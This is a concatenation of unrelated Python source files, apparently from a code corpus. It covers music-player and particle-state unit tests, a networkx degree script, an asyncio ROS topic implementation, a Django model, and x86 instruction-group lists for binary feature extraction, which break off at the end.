for line in archival_file:
attr_name, value = line.strip().split(': ')
# Try to cast the attribute to an int (since it might be a
# revision number). If it doesn't cast, leave it as a string.
try:
value = int(value)
except ValueError:
pass
attributes[attr_name] = value
return attributes
| 10,882 | 3,210 |
from mopidy import utils
from tests import unittest
class GetClassTest(unittest.TestCase):
    """Tests for utils.get_class dotted-path class loading."""

    def test_loading_module_that_does_not_exist(self):
        # Unknown top-level module -> ImportError.
        with self.assertRaises(ImportError):
            utils.get_class('foo.bar.Baz')

    def test_loading_class_that_does_not_exist(self):
        # Module exists but the attribute does not -> ImportError.
        with self.assertRaises(ImportError):
            utils.get_class('unittest.FooBarBaz')

    def test_loading_incorrect_class_path(self):
        # No dot at all is not a valid "module.Class" path.
        with self.assertRaises(ImportError):
            utils.get_class('foobarbaz')

    def test_import_error_message_contains_complete_class_path(self):
        try:
            utils.get_class('foo.bar.Baz')
        except ImportError as e:
            self.assertIn('foo.bar.Baz', str(e))

    def test_loading_existing_class(self):
        cls = utils.get_class('unittest.TestCase')
        self.assertEqual(cls.__name__, 'TestCase')
| 878 | 289 |
from __future__ import print_function
import numpy as np
import random
import json
import sys
import os
import networkx as nx
from networkx.readwrite import json_graph
# This script relies on the networkx 1.x API (G.node); refuse to run on 2.x.
version_info = list(map(int, nx.__version__.split('.')))
major = version_info[0]
minor = version_info[1]
assert (major <= 1) and (minor <= 11), "networkx major version > 1.11"

if __name__ == "__main__":
    # Usage: python <script> <graph.json>
    graph_file = sys.argv[1]
    with open(graph_file) as f:
        G_data = json.load(f)
    G = json_graph.node_link_graph(G_data)
    # Keep only training nodes (drop validation and test nodes).
    nodes = [n for n in G.nodes() if not G.node[n]["val"] and not G.node[n]["test"]]
    G = G.subgraph(nodes)
    # BUG FIX: the original reused `count` both as the enumerate() index and
    # as the degree accumulator, so the printed average was garbage.  Use a
    # dedicated accumulator instead.
    total_degree = 0
    max_node_degree = 0
    for node in nodes:
        degree = G.degree(node)
        total_degree += degree
        if degree > max_node_degree:
            max_node_degree = degree
    avg_node_degree = total_degree / len(nodes)
    print(len(nodes), avg_node_degree, max_node_degree)
    print(nx.is_connected(G))
| 1,054 | 389 |
from asyncio import AbstractEventLoop
from asyncio import iscoroutinefunction
from asyncio import Event
from asyncio import IncompleteReadError
from asyncio import Queue
from asyncio import open_connection
from asyncio import open_unix_connection
from typing import Dict
from typing import List
from typing import Set
from typing import Tuple
from typing import Type
from genpy import Message
from ..api.node_api_client import NodeApiClient
from .protocol import Serializer
from .protocol import encode_header
from .protocol import read_data
from .protocol import read_header
from .publisher import Publisher
from .subscription import Subscription
class SubscriberInitError(Exception):
    """Raised when a publisher's handshake reply contains an error field."""
    pass
class Topic:
    """Bookkeeping for one topic: local pubs/subs plus remote peer links."""

    def __init__(
        self,
        loop: AbstractEventLoop,
        node_name: str,
        topic_name: str,
        msg_type: Type[Message]
    ) -> None:
        self._loop = loop
        self._node_name = node_name
        self._topic_name = topic_name
        self._msg_type = msg_type
        # Remote peers: subscriber queues keyed by node name, publisher
        # shutdown events keyed by publisher URI.
        self._connected_subscribers: Dict[str, Queue] = {}
        self._connected_publishers: Dict[str, Event] = {}
        self._has_connected_subscribers: Event = Event()
        self._has_connected_publishers: Event = Event()
        # Endpoints registered locally on this node.
        self._internal_subscriptions: Set[Subscription] = set()
        self._internal_publishers: Set[Publisher] = set()
        # Last serialized message per latching publisher, replayed to
        # newly connecting subscribers.
        self._latched_msgs: Dict[Publisher, bytes] = {}
        self._serializer: Serializer = Serializer()

    @property
    def name(self) -> str:
        return self._topic_name

    @property
    def type(self) -> Type[Message]:
        return self._msg_type

    @property
    def type_name(self) -> str:
        return self._msg_type._type

    @property
    def md5sum(self) -> str:
        return self._msg_type._md5sum

    @property
    def nr_connected_subscribers(self) -> int:
        return len(self._connected_subscribers)

    @property
    def nr_connected_publishers(self) -> int:
        return len(self._connected_publishers)

    async def wait_for_connected_subscribers(self) -> None:
        await self._has_connected_subscribers.wait()

    async def wait_for_connected_publishers(self) -> None:
        await self._has_connected_publishers.wait()

    @property
    def has_subscriptions(self) -> bool:
        return bool(self._internal_subscriptions)

    @property
    def has_publishers(self) -> bool:
        return bool(self._internal_publishers)

    @property
    def is_latching(self) -> bool:
        # The topic latches if any local publisher latches.
        return any(pub.latch for pub in self._internal_publishers)

    def get_publisher_header(self) -> Dict[str, str]:
        """Build the connection header sent to connecting subscribers."""
        return dict(
            topic=self.name,
            type=self.type_name,
            latching='1' if self.is_latching else '0',
            message_definition=self.type._full_text,
            md5sum=self.md5sum,
            callerid=self._node_name)

    def register_publisher(
        self,
        publisher: Publisher
    ) -> None:
        self._internal_publishers.add(publisher)

    async def unregister_publisher(
        self,
        publisher: Publisher
    ) -> bool:
        """Remove *publisher*; return True while publishers remain."""
        self._latched_msgs.pop(publisher, None)
        self._internal_publishers.discard(publisher)
        return self.has_publishers

    def register_subscription(
        self,
        subscription: Subscription
    ) -> None:
        self._internal_subscriptions.add(subscription)

    async def unregister_subscription(
        self,
        subscription: Subscription
    ) -> bool:
        """Remove *subscription*; return True while subscriptions remain."""
        self._internal_subscriptions.discard(subscription)
        if not self.has_subscriptions:
            # No local subscriptions left: tell every _subscribe() task
            # to drop its connection.
            for event in self._connected_publishers.values():
                event.set()
        return self.has_subscriptions

    def publish(
        self,
        publisher: Publisher,
        msg: Message
    ) -> None:
        """Serialize *msg* once and fan it out to all connected peers."""
        if not self._connected_subscribers and not self.is_latching:
            return
        with self._serializer.serialize(msg) as serialized_msg:
            for queue in self._connected_subscribers.values():
                queue.put_nowait(serialized_msg)
            if publisher.latch:
                self._latched_msgs[publisher] = serialized_msg

    async def connect_subscriber(
        self,
        node_name: str,
        queue: Queue
    ) -> None:
        """Attach a remote subscriber, replaying latched messages first."""
        for publisher in self._internal_publishers:
            if publisher.on_peer_connect:
                msg = publisher.on_peer_connect(node_name)
                if msg:
                    with self._serializer.serialize(msg) as serialized_msg:
                        await queue.put(serialized_msg)
            serialized_msg = self._latched_msgs.get(publisher)
            if serialized_msg is not None:
                await queue.put(serialized_msg)
        self._connected_subscribers[node_name] = queue
        self._has_connected_subscribers.set()

    def disconnect_subscriber(
        self,
        node_name: str
    ) -> None:
        for publisher in self._internal_publishers:
            if publisher.on_peer_disconnect:
                publisher.on_peer_disconnect(node_name)
        del self._connected_subscribers[node_name]
        if not self._connected_subscribers:
            self._has_connected_subscribers.clear()

    def connect_to_publishers(
        self,
        publishers: List[str]
    ) -> None:
        """Reconcile our publisher connections against *publishers*."""
        publishers_set = set(publishers)
        for publisher_uri in publishers:
            if publisher_uri in self._connected_publishers:
                continue
            self._connected_publishers[publisher_uri] = Event()
            self._loop.create_task(
                self._subscribe(publisher_uri))
        # Signal tasks for publishers that disappeared to disconnect.
        for publisher_uri in self._connected_publishers:
            if publisher_uri not in publishers_set:
                self._connected_publishers[publisher_uri].set()

    async def _subscribe(
        self,
        publisher_uri: str
    ) -> None:
        """Connect to one remote publisher and pump messages until stopped."""
        connection_params = await self._get_publisher_connection_params(
            publisher_uri)
        # BUG FIX: `writer` must exist for the finally block even when the
        # connection attempt itself raises (e.g. ConnectionRefusedError),
        # otherwise cleanup dies with NameError and masks the real failure.
        writer = None
        try:
            # _get_publisher_connection_params() guarantees the protocol
            # is one of the two handled below.
            if connection_params[0] == 'UNIXROS':
                reader, writer = await open_unix_connection(
                    connection_params[1])
            elif connection_params[0] == 'TCPROS':
                reader, writer = await open_connection(
                    connection_params[1],
                    int(connection_params[2]))
            header = dict(
                topic=self.name,
                message_definition=self.type._full_text,
                tcp_nodelay='1',
                md5sum=self.md5sum,
                type=self.type_name,
                callerid=self._node_name)
            writer.write(encode_header(header))
            await writer.drain()
            header_dict = await read_header(reader)
            if 'error' in header_dict:
                raise SubscriberInitError(header_dict['error'])
            self._has_connected_publishers.set()
            # Pump messages until connect_to_publishers()/unregister sets
            # our shutdown event.
            while not self._connected_publishers[publisher_uri].is_set():
                msg = self.type()
                msg.deserialize(await read_data(reader))
                for sub in self._internal_subscriptions:
                    if iscoroutinefunction(sub.callback):
                        self._loop.create_task(sub.callback(msg))
                    else:
                        self._loop.call_soon(sub.callback, msg)
        except (ConnectionResetError, IncompleteReadError):
            # Peer went away; treated as a normal disconnect.
            pass
        finally:
            if writer is not None:
                writer.close()
                # wait_closed() only exists on Python >= 3.7 stream writers.
                if hasattr(writer, 'wait_closed'):
                    await writer.wait_closed()
            self._connected_publishers.pop(publisher_uri)
            if not self._connected_publishers:
                self._has_connected_publishers.clear()

    async def _get_publisher_connection_params(
        self,
        publisher_uri: str
    ) -> Tuple[str, int]:
        """Negotiate transport parameters with the publisher's node API."""
        client = NodeApiClient(self._node_name, publisher_uri)
        topic = await client.request_topic(
            self.name,
            [['UNIXROS'], ['TCPROS']])
        await client.close()
        if topic[0] not in ('UNIXROS', 'TCPROS'):
            raise ValueError('protocol is not supported')
        return topic
| 8,167 | 2,297 |
import json
import os
import unittest
from opta.core.local import Local
from opta.layer import Layer
class LocalTests(unittest.TestCase):
    """Tests for the Local backend, using throwaway fixture files in /tmp."""

    def setUp(self) -> None:
        self.layer = Layer(
            name="testname",
            org_name="testorg",
            providers={"local": {"path": "/tmp"}},
            modules_data=[],
            path="/tmp",
            parent=None,
        )
        self.local = Local(self.layer)
        # Point the backend at fixture files we control.
        self.local.tf_file = "/tmp/tfconfig"
        self.local.config_file_path = "/tmp/localconfig"
        with open(self.local.config_file_path, "w") as f:
            json.dump(
                {
                    "opta_version": "dev",
                    "date": "2021-11-15T18:26:47.553097",
                    "original_spec": "",
                    "defaults": {},
                },
                f,
            )
        with open(self.local.tf_file, "w") as f:
            f.write("Some tf state for testing")
        return super().setUp()

    def tearDown(self) -> None:
        # Remove the fixture files so each test starts clean.
        if os.path.isfile("/tmp/localconfig"):
            os.remove("/tmp/localconfig")
        if os.path.isfile("/tmp/tfconfig"):
            os.remove("/tmp/tfconfig")
        return super().tearDown()

    def test_get_remote_config(self) -> None:
        assert self.local.get_remote_config() == {
            "opta_version": "dev",
            "date": "2021-11-15T18:26:47.553097",
            "original_spec": "",
            "defaults": {},
        }

    def test_upload_opta_config(self) -> None:
        self.local.upload_opta_config()
        # FIX: the original shadowed the builtin `dict` and leaked the file
        # handle via json.load(open(...)).
        with open(self.local.config_file_path, "r") as f:
            config = json.load(f)
        assert set(config.keys()) == set(
            ["opta_version", "original_spec", "date", "defaults"]
        )

    def test_delete_remote_state(self) -> None:
        self.local.delete_remote_state()
        assert os.path.isfile(self.local.tf_file) is False
| 1,911 | 615 |
from environments.maze_env import MazeEnv
from environments.ant import AntEnv
class AntMazeEnv(MazeEnv):
    """MazeEnv variant that uses AntEnv as its agent model."""
    # Model class consumed by the MazeEnv base class — presumably
    # instantiated there; verify against MazeEnv.
    MODEL_CLASS = AntEnv
| 132 | 45 |
import numpy as np # type: ignore
import pytest
from ladim2.state import State
# ------------
# __init__
# ------------
def test_init_minimal():
    """Init State with no arguments"""
    S = State()
    # A fresh state is empty and exposes only the mandatory variables.
    assert len(S) == 0
    assert S.npid == 0
    assert set(S.variables) == {"pid", "X", "Y", "Z", "active", "alive"}
    assert S.instance_variables == {"pid", "X", "Y", "Z", "active", "alive"}
    assert S.particle_variables == set()
    assert S.pid.dtype == int
    assert all(S.pid == [])
    # A variable is reachable three equivalent ways: attribute, item access,
    # and the variables dict.
    assert S.X.dtype == np.float64
    assert all(S.variables["X"] == [])
    assert all(S["X"] == [])
    assert all(S.X == [])
    assert S.Y.dtype == float
    assert S.Z.dtype == "f8"
    assert S.alive.dtype == bool
    assert S.default_values["alive"]
def test_init_args():
    """Init State with extra variables"""
    S = State(
        instance_variables=dict(age=float, stage=int),
        particle_variables=dict(release_time="time"),
        default_values=dict(age=0, stage=1),
    )
    assert "age" in S.instance_variables
    assert S.age.dtype == float
    assert S.default_values["age"] == 0
    assert S.stage.dtype == int
    assert S.particle_variables == {"release_time"}
    # The "time" dtype alias maps to second-resolution numpy datetime64.
    assert S.release_time.dtype == np.dtype("M8[s]")
    assert S.dtypes["release_time"] == np.dtype("M8[s]")
    assert all(S.release_time == np.array([], np.datetime64))
def test_override_mandatory():
    """A mandatory variable's dtype can be overridden at init."""
    S = State(instance_variables=dict(X="f4"))
    assert S.X.dtype == np.float32
def test_set_default_err1():
    """Trying to set default for an undefined variable"""
    with pytest.raises(ValueError):
        # "length" is neither mandatory nor declared -> ValueError.
        State(particle_variables={"age": float}, default_values=dict(length=4.3))
def test_set_default_err2():
    """Trying to set default for pid"""
    # pid is managed internally, so a user-supplied default is rejected.
    with pytest.raises(ValueError):
        S = State(default_values=dict(pid=42))
def test_set_default_err3():
    """Trying to set an array as default value"""
    # Default values must be scalars.
    with pytest.raises(TypeError):
        S = State(
            instance_variables=dict(length=float),
            default_values=dict(length=[1.2, 4.3]),
        )
# --------------------
# append
# --------------------
def test_append_scalar():
    """Appending scalars adds a single particle with an auto-assigned pid."""
    state = State()
    state.append(X=200, Z=5, Y=100)
    assert len(state) == 1
    assert state.npid == 1
    assert np.all(state.pid == [0])
    # New particles start active and alive.
    assert np.all(state.active == [True])
    assert np.all(state.alive == [True])
    assert np.all(state.X == [200])
def test_append_array():
    """Append an array to a non-empty state"""
    state = State()
    state.append(X=200, Z=5, Y=100)
    length = len(state)
    npid = state.npid
    # Scalar arguments (Y) broadcast against the array-valued ones.
    state.append(X=np.array([201, 202]), Y=110, Z=[5, 10])
    assert len(state) == length + 2
    assert state.npid == npid + 2
    assert np.all(state.pid == [0, 1, 2])
    assert np.all(state["pid"] == [0, 1, 2])
    assert np.all(state.variables["pid"] == [0, 1, 2])
    assert np.all(state.active == 3 * [True])
    assert np.all(state.alive == 3 * [True])
    assert np.all(state.X == [200, 201.0, 202.0])
    assert np.all(state["X"] == [200, 201.0, 202.0])
    assert np.all(state.variables["X"] == [200, 201.0, 202.0])
    assert np.all(state.Y == [100.0, 110.0, 110.0])
    assert np.all(state.Z == [5.0, 5.0, 10.0])
def test_extra_instance_variables():
    """Append with extra instance variables, with and without default"""
    state = State(
        instance_variables=dict(age=float, stage="int"), default_values=dict(stage=1)
    )
    assert len(state) == 0
    assert state.age.dtype == float
    assert state.stage.dtype == int
    # stage is omitted here, so it takes its declared default of 1.
    state.append(X=[1, 2], Y=2, Z=3, age=0)
    assert len(state) == 2
    assert all(state.age == [0, 0])
    assert all(state.stage == [1, 1])
def test_append_nonvariable():
    """Append an undefined variable"""
    state = State()
    # "length" was never declared -> ValueError.
    with pytest.raises(ValueError):
        state.append(X=1, Y=2, Z=3, length=20)
def test_append_missing_variable():
    """A missing mandatory instance variable is filled with NaN."""
    state = State()
    # with pytest.raises(TypeError):
    # Now Y becomes NaN, correct behaviour??
    state.append(X=100, Z=10)
    # NaN != NaN, so this asserts that Y[0] is NaN.
    assert state.Y[0] != state.Y[0]
def test_append_missing_particle_variable():
    """A particle variable omitted from append is filled with NaN."""
    state = State(particle_variables=dict(X_start=float))
    # with pytest.raises(TypeError):
    state.append(X=100, Y=200, Z=5)
    # NaN != NaN, so this asserts that X_start[0] is NaN.
    assert state.X_start[0] != state.X_start[0]
def test_append_shape_mismatch():
    """Arrays of incompatible lengths cannot be appended together."""
    state = State()
    with pytest.raises(ValueError):
        state.append(X=[100, 101], Y=[200, 201, 202], Z=5)
def test_missing_default():
    """A declared variable with no default and no value becomes NaN."""
    state = State(
        instance_variables=dict(age=float, stage=int), default_values=dict(age=0)
    )
    # No default for stage
    # with pytest.raises(TypeError):
    #     state.append(X=1, Y=2, Z=3)
    # changed behaviour: now check for NaN
    state.append(X=1, Y=2, Z=3)
    assert state.stage[0] != state.stage[0]
def test_not_append_pid():
    """Can not append to pid"""
    S = State()
    # pid is assigned internally; passing it explicitly is an error.
    with pytest.raises(ValueError):
        S.append(X=10, Y=20, Z=5, pid=101)
# ----------------
# Update
# ----------------
def test_variable_update():
    """Update a variable, low level"""
    S = State()
    S.append(X=[100, 110], Y=[200, 210], Z=5)
    # In-place update through the underlying variables dict.
    S.variables["X"] += 1
    assert all(S.variables["X"] == [101, 111])
def test_update_item():
    """Item style variable update is OK"""
    S = State()
    S.append(X=[100, 110], Y=[200, 210], Z=5)
    S["X"] += 1
    assert all(S.variables["X"] == [101, 111])
def test_update_attr():
    """Attribute style assignment to variables is not allowed"""
    S = State()
    S.append(X=[100, 110], Y=[200, 210], Z=5)
    # Attribute access is read-only; use item access for updates.
    with pytest.raises(AttributeError):
        S.X += 1
def test_update_error_not_variable():
    """Item assignment to an undeclared variable raises KeyError."""
    S = State()
    S.append(X=[100, 110], Y=[200, 210], Z=5)
    with pytest.raises(KeyError):
        S["Lon"] = [4.5, 4.6]
def test_update_error_wrong_size():
    """Item assignment with a mismatched size raises KeyError."""
    # Alternative broadcast the scalar, equivalent to s["X"] = [110, 100]
    S = State()
    S.append(X=[100, 110], Y=[200, 210], Z=5)
    # Scalars are not broadcast on assignment ...
    with pytest.raises(KeyError):
        S["X"] = 110
    # ... and the length must match exactly.
    with pytest.raises(KeyError):
        S["X"] = [101, 111, 121]
# --------------
# Compactify
# --------------
def test_compactify():
    """compactify() removes dead particles but keeps pid numbering."""
    S = State(default_values=dict(Z=5))
    S.append(X=[10, 11], Y=[1, 2])
    assert len(S) == 2
    S.append(X=[21, 22], Y=[3, 4])
    assert len(S) == 4
    # Kill second particle
    S.alive[1] = False
    S.compactify()
    assert len(S) == 3
    # npid counts all particles ever created, including removed ones.
    assert S.npid == 4
    assert np.all(S.active)
    assert np.all(S.alive)
    assert np.all(S.pid == [0, 2, 3])
    assert np.all(S.X == [10, 21, 22])
    # The arrays should be contiguous after removing an element
    assert S.X.flags["C_CONTIGUOUS"]
def test_not_compactify_particle_variables():
    """Particle variables keep one slot per pid across compactify()."""
    S = State(particle_variables=dict(X0=float), default_values=dict(Z=5))
    X0 = [10, 11, 12, 13]
    Y0 = [20, 21, 22, 23]
    S.append(X=X0, Y=Y0, X0=X0)
    S.alive[1] = False
    S.compactify()
    assert len(S) == 3
    assert all(S.pid == [0, 2, 3])
    assert all(S.X == [10, 12, 13])
    # particle_variable X0 is not compactified
    assert all(S.X0 == X0)
def test_update_and_append_and_compactify():
    """Check that updating bug has been fixed"""
    S = State()
    # One particle
    S.append(X=100, Y=10, Z=5)
    assert all(S.pid == [0])
    assert all(S.X == [100])
    # Update position
    S["X"] += 1
    assert all(S.pid == [0])
    assert all(S.X == [101])
    # Update first particle and add two new particles
    S["X"] += 1
    S.append(X=np.array([200, 300]), Y=np.array([20, 30]), Z=5)
    assert all(S.pid == [0, 1, 2])
    assert all(S.X == [102, 200, 300])
    # Update particle positions and kill the first particle, pid=0
    S["X"] = S["X"] + 1.0
    S["alive"][0] = False
    S.compactify()
    assert all(S.pid == [1, 2])
    assert all(S.X == [201, 301])
    # Updates keep working on the compactified arrays.
    S["X"] = S["X"] + 1
    assert all(S.pid == [1, 2])
    assert all(S.X == [202, 302])
| 7,943 | 3,209 |
from django.db import models
# Create your models here.
class Friend(models.Model):
name = models.CharField(max_length=60)
email = models.CharField(max_length=60)
def __str__(self):
return self.name
| 220 | 68 |
from tiknib.feature.asm_ppc import PPC_GRP_MAP
# ==================== x86 32 =============================================
# data transfer
X86_GRP_DTRANSFER = [
# general purpose instructions
"CMOV",
"CMOVA",
"CMOVAE",
"CMOVB",
"CMOVBE",
"CMOVC",
"CMOVE",
"CMOVG",
"CMOVGE",
"CMOVL",
"CMOVLE",
"CMOVNA",
"CMOVNAE",
"CMOVNB",
"CMOVNBE",
"CMOVNC",
"CMOVNE",
"CMOVNG",
"CMOVNGE",
"CMOVNL",
"CMOVNLE",
"CMOVNO",
"CMOVNP",
"CMOVNS",
"CMOVNZ",
"CMOVO",
"CMOVP",
"CMOVPE",
"CMOVPO",
"CMOVS",
"CMOVZ",
"BSWAP",
"XCHG",
"XADD",
"CMPXCHG",
"CMPXCHG8B",
"POP",
"POPA",
"POPAD",
"PUSH",
"PUSHA",
"PUSHAD",
"CDQ",
"CDQE",
"CBW",
"CWD",
"CWDE",
"MOV",
"MOVD",
"MOVQ",
"MOVABS",
"MOVSX",
"MOVSXD",
"MOVZX",
"MOVZXD",
# string
"MOVS",
"MOVSB",
"MOVSD",
"MOVSW",
"STOS",
"STOSB",
"STOSD",
"STOSW",
"LODS",
"LODSB",
"LODSD",
"LODSW",
# segment register
"LDS",
"LES",
"LFS",
"LGS",
"LSS",
# user mode extended
"XSAVE",
"XSAVEC",
"XSAVEOPT",
"XRSTOR",
"XGETBV",
"XSETBV",
# BMI1, BMI2
"BEXTR",
"BLSI",
"PDEP",
"PEXT",
# MMX
"PACKSSDW",
"PACKSSWB",
"PACKUSDW",
"PACKUSWB",
"PUNPCKHBW",
"PUNPCKHDQ",
"PUNPCKHWD",
"PUNPCKLBW",
"PUNPCKLDQ",
"PUNPCKLWD",
"EMMS",
# SSE 64-bit integer
"PMOVMSKB",
"PSHUFW",
# SSE2 128-bit integer
"MOVDQA",
"MOVDQU",
"MOVQ2DQ",
"MOVDQ2Q",
"PSHUFLW",
"PSHUFHW",
"PSHUFD",
"PUNPCKLQDQ",
"PUNPCKHQDQ",
# SSSE2
"PSHUFB",
"PALIGNR",
# SSE4
"MOVNTDQA",
"PBLENDVB",
"PBLENDW",
"PINSRB",
"PINSRD",
"PINSRQ",
"PEXTRB",
"PEXTRW",
"PEXTRD",
"PEXTRQ",
"PMOVSXBW",
"PMOVZXBW",
"PMOVSXBD",
"PMOVZXBD",
"PMOVSXWD",
"PMOVZXWD",
"PMOVSXBQ",
"PMOVZXBQ",
"PMOVSXWQ",
"PMOVZXWQ",
"PMOVSXDQ",
"PMOVZXDQ",
"PACKUSDW",
"LGDT",
"SGDT",
"LLDT",
"SLDT",
"LTR",
"STR",
"LIDT",
"SIDT",
"MOV",
"LMSW",
"SMSW",
"CLTS",
"LSL",
"LAR",
"VERR",
"VERW",
# 64-bit
"CDQE",
"CQO",
]
# x86 floating-point / SIMD data-transfer mnemonics.
X86_GRP_FLOAT_DTRANSFER = [
    # floating point instructions
    "FLD",
    "FST",
    "FSTP",
    "FILD",
    "FIST",
    "FISTP",
    "FBLD",
    "FBSTP",
    "FXCH",
    "FCMOVB",
    "FCMOVBE",
    "FCMOVE",
    "FCMOVNB",
    "FCMOVNBE",
    "FCMOVNE",
    "FCMOVNU",
    "FCMOVU",
    # floating point load const instructions
    "FLD1",
    "FLDZ",
    "FLDPI",
    "FLDL2E",
    "FLDLN2",
    "FLDL2T",
    "FLDLG2",
    # FPU register related
    "FCLEX",
    "FFREE",
    "FINIT",
    "FLDCW",
    "FLDENV",
    "FNCLEX",
    "FNINIT",
    "FNOP",
    "FNSAVE",
    "FNSTCW",
    "FNSTENV",
    "FNSTSW",
    "FRSTOR",
    "FSAVE",
    "FSTCW",
    "FSTENV",
    "FSTSW",
    # SSE
    "MOVAPS",
    "MOVUPS",
    "MOVHPS",
    "MOVHLPS",
    "MOVLPS",
    "MOVLHPS",
    "MOVMSKPS",
    "MOVSS",
    # SSE2
    "MOVAPD",
    "MOVUPD",
    "MOVHPD",
    "MOVHLPD",
    "MOVLPD",
    "MOVLHPD",
    "MOVMSKPD",
    "MOVSD",
    # SSE Shuffle
    "SHUFPS",
    "UNPCKHPS",
    "UNPCKLPS",
    # SSE2 shuffle
    "SHUFPD",
    "UNPCKHPD",
    "UNPCKLPD",
    # SSE Conversion
    "CVTPI2PS",
    "CVTSI2SS",
    "CVTPS2PI",
    "CVTTPS2PI",
    "CVTSS2SI",
    "CVTTSS2SI",
    # SSE2 Conversion
    "CVTPD2PI",
    "CVTTPD2PI",
    "CVTPI2PD",
    "CVTPD2DQ",
    "CVTTPD2DQ",
    "CVTDQ2PD",
    "CVTPS2PD",
    "CVTPD2PS",
    "CVTSS2SD",
    "CVTSD2SS",
    "CVTSD2SI",
    "CVTTSD2SI",
    "CVTSI2SD",
    "CVTDQ2PS",
    "CVTPS2DQ",
    "CVTTPS2DQ",
    # SSE MXCSR State
    "LDMXCSR",
    "STMXCSR",
    # SSE 64-bit
    "PEXTRW",
    "PINSRW",
    # SSE cache
    "MASKMOVQ",
    "MOVNTQ",
    "MOVNTPS",
    "PREFETCH",
    "SFENCE",
    # SSE3
    "FISTTP",
    "LDDQU",
    "MOVSHDUP",
    "MOVSLDUP",
    "MOVDDUP",
    # SSE4
    "BLENDPD",
    "BLENDPS",
    "BLENDVPD",
    "BLENDVPS",
    "EXTRACTPS",
    "INSERTPS",
    # 16-bit FP
    "VCVTPS2PH",
    "VCVTPS2PH",
    # Vector
    "VALIGN",
    "VBLEND",
    "VCOMPRESS",
    "VEXTRACT",
    "VINSERT",
    "VMOV",
    "VFIXUP",
    "VGET",
    "VEXPAND",
    "VCVT",
    "VPBLEND",
    "VPBROAD",
    "VPCOMPRESS",
    # BUG FIX: these three entries were written without separating commas,
    # so implicit string concatenation produced the single bogus entry
    # "VPERMVPEXPANDVPMOV".
    "VPERM",
    "VPEXPAND",
    "VPMOV",
    "VPSCATTER",
    "VSCATTER",
    "VSHUF",
]
# - Miscellaneous Instructions:
X86_GRP_MISC = [
"NOP",
"UD",
"UD2",
"LEA",
"XLAT",
"XLATB",
"CPUID",
"MOVBE",
"PREFETCHW",
"PREFETCHWT1",
"CLFLUSH",
"CLFLUSHOPT",
# SSE2 cache
"CLFLUSH",
"LFENCE",
"MFENCE",
"MASKMOVDQU",
"MOVNTPD",
"MOVNTDQ",
"MOVNTI",
]
X86_GRP_ARITH = [
# general purpose binary arithmetic instructions
"ADCX",
"ADOX",
"ADC",
"ADD",
"XADD",
"SUB",
"SBB",
"IMUL",
"MUL",
"IDIV",
"DIV",
"INC",
"DEC",
"NEG",
"CMP",
# decimal arithmetic instructions
"DAA",
"DAS",
"AAA",
"AAS",
"AAM",
"AAD",
# flag
"STC",
"CLC",
"CMC",
"CLD",
"STD",
# BMI1, BMI2
"MULX",
# MMX
"PADD",
"PADDB",
"PADDW",
"PADDD",
"PADDSB",
"PADDSW",
"PADDUSB",
"PADDUSW",
"PSUB",
"PSUBB",
"PSUBW",
"PSUBD",
"PSUBSB",
"PSUBSW",
"PSUBUSB",
"PSUBUSW",
"PMULHW",
"PMULLW",
"PMADDWD",
# SSE 64bit integer
"PAVGB",
"PAVGW",
"PMAXUB",
"PMAXSB",
"PMINUB",
"PMINSB",
"PMULHUW",
"PSADBW",
# SSE 128-bit integer
"PMULUDQ",
"PADDQ",
"PSUBQ",
# SSSE3
"PHADDW",
"PHADDSW",
"PHADDD",
"PHSUBW",
"PHSUBSW",
"PHSUBD",
"PABSB",
"PABSW",
"PABSD",
"PABSQ",
"PMADDUBSW",
"PMULHRSW",
"PSIGNB",
"PSIGNW",
"PSIGND",
# SSE4
"PMULLD",
"PMULDQ",
"PMINUW",
"PMINUD",
"PMINSB",
"PMINSD",
"PMAXUW",
"PMAXUD",
"PMAXSB",
"PMAXSD",
"ROUNDPS",
"ROUNDPD",
"ROUNDSS",
"ROUNDSD",
"PMPSADBW",
# AESNI
"AESDEC",
"AESDECLAST",
"AESENC",
"AESENCLAST",
"AESIMC",
"AESKEYGENASSIST",
"PCLMULQDQ",
# SHA1
"SHA1MSG1",
"SHA1MSG2",
"SHA1NEXTE",
"SHA1RNDS4",
"SHA256MSG1",
"SHA256MSG2",
"SHA256RNDS2",
"CRC32",
# BMI1, BMI2
"BLSMSK",
"BLSR",
"CLAC",
"STAC",
]
X86_GRP_FLOAT_CMP = [
# floating point compare instructions
"FCOM",
"FCOMP",
"FCOMPP",
"FUCOM",
"FUCOMP",
"FUCOMPP",
"FICOM",
"FICOMP",
"FCOMI",
"FUCOMI",
"FCOMIP",
"FUCOMIP",
"FTST",
"FXAM",
# SSE
"CMPPS",
"CMPEQPS",
"CMPNEQPS",
"CMPLTPS",
"CMPNLTPS",
"CMPSS",
"CMPEQSS",
"CMPNEQSS",
"CMPLTSS",
"CMPNLTSS",
"COMISS",
"UCOMISS",
"CMPPD",
"CMPEQPD",
"CMPNEQPD",
"CMPLTPD",
"CMPNLTPD",
"CMPSD",
"CMPEQSD",
"CMPNEQSD",
"CMPLTSD",
"CMPNLTSD",
"COMISD",
"UCOMISD",
# vector
"VPCMP",
]
X86_GRP_FLOAT_ARITH = [
# - floating point instructions:
"FADD",
"FADDP",
"FIADD",
"FSUB",
"FSUBP",
"FISUB",
"FSUBR",
"FSUBRP",
"FISUBR",
"FMUL",
"FMULP",
"FIMUL",
"FDIV",
"FDIVP",
"FIDIV",
"FDIVR",
"FDIVRP",
"FIDIVR",
"FPREM",
"FPREM1",
"FABS",
"FCHS",
"FRNDINT",
"FSCALE",
"FSQRT",
"FXTRACT",
# floating point transcendental instructions
"FSIN",
"FCOS",
"FSINCOS",
"FPTAN",
"FPATAN",
"F2XM1",
"FYL2X",
"FYL2XP1",
# fpu register related
"FINCSTP",
"FDECSTP",
# SSE
"ADDPS",
"ADDSS",
"SUBPS",
"SUBSS",
"MULPS",
"MULSS",
"DIVPS",
"DIVSS",
"RCPPS",
"RCPSS",
"SQRTPS",
"SQRTSS",
"RSQRTPS",
"RSQRTSS",
"MAXPS",
"MAXSS",
"MINPS",
"MINSS",
# SSE2
"ADDSD",
"SUBSD",
"MULSD",
"DIVSD",
"RCPSD",
"SQRTSD",
"RSQRTSD",
"MAXSD",
"MINSD",
# SSE3
"ADDSUBPS",
"ADDSUBPD",
"HADDPS",
"HSUBPS",
"HADDPD",
"HSUBPD",
# SSE4
"DPPD",
"DPPS",
# vector
"VPMAX",
"VPMIN",
"VRCP",
"VRNDSCAL",
"VRSQRT",
"VSCALE",
"ADDPD",
"ADDSD",
"MULPD",
"MULSD",
"SUBPD",
"SUBSD",
"DIVPD",
"DIVSD",
"RCPPD",
"RCPSD",
]
X86_GRP_CMP = [
"CMP",
"COMI",
"CLT",
# from dtransfer
